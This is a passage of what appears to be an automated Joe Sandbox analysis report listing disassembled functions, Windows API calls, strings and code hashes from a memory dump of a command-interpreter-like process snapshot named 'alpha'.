                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A511532A09B4B86F700AF51A85417DBBA0FB5AB91BD48172DA5F43770CFBCE4548A20

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0a000e2b9965f392e216a52b0a9aba1fc1a738f94547f6155f6b8c51109368fb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8751E562B0868B85FB30AB1595442BEE290FB54BE0FD44272DE6F876F0DFBCE4418210
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 092ce4a5c4121f18bac830377546ce69030fc0735eaf62e2392c65e45dbaf61f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EBB09214E2541BD1E704BB219C820A852A06B68710FD01472C00F80270DEAC919BC710

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524D9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15258E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7D153C6DB), ref: 00007FF7D15258EF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524DBB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1524DCA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524DE0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1524DEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E04
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D1520589
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: SetConsoleMode.KERNELBASE ref: 00007FF7D152059E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D15205AF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: GetConsoleMode.KERNELBASE ref: 00007FF7D15205C5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D15205EF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: GetConsoleMode.KERNELBASE ref: 00007FF7D1520605
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D1520632
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: SetConsoleMode.KERNELBASE ref: 00007FF7D1520647
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7D1524E35), ref: 00007FF7D15255DA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525623
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525667
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D15256BE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525702
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E35
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E81
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524F69
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524F95
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FB0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FD8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FF8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525037
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152504B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D15250DF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D15250F2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152510F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525130
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152514A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525175
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1049357271-3021193919

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1809961153-336475711

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2622545777-4197029667

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1606018815-3025314500
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 29b71c908c8d31d66ee902027ca77db465c7e9ac89c9aee9236c1acaf79c43e2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8541DC75A0961B8BF7546B15E8542BCBAB0BF89751FD49276D90F82370DFBCA4048620

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleTitlewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: /$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2364928044-4222935259
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e2ca0c16b49d53aeb54f77df9532cc4c6649e3e8c7334f42884c1fbeddce7399
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CC18C62A1864B81FB65BB15A4542BDB2A1AF41B90FC64132D91F472F5DFBDE884C330

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4291973834-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d5c798492a9ea8eadece112d5374d136a8042fe81ae4d24956d32f1238edd288
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0541C922A0861F86F750BB50E94027DA2E0AF54754FE444B7EA1F876B4DFFCE8448760

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1208 7ff7d1524a14-7ff7d1524a3e GetEnvironmentStringsW 1209 7ff7d1524aae-7ff7d1524ac5 1208->1209 1210 7ff7d1524a40-7ff7d1524a46 1208->1210 1211 7ff7d1524a48-7ff7d1524a52 1210->1211 1212 7ff7d1524a59-7ff7d1524a8f GetProcessHeap HeapAlloc 1210->1212 1211->1211 1213 7ff7d1524a54-7ff7d1524a57 1211->1213 1214 7ff7d1524a9f-7ff7d1524aa9 FreeEnvironmentStringsW 1212->1214 1215 7ff7d1524a91-7ff7d1524a9a memmove 1212->1215 1213->1211 1213->1212 1214->1209 1215->1214
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1623332820-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
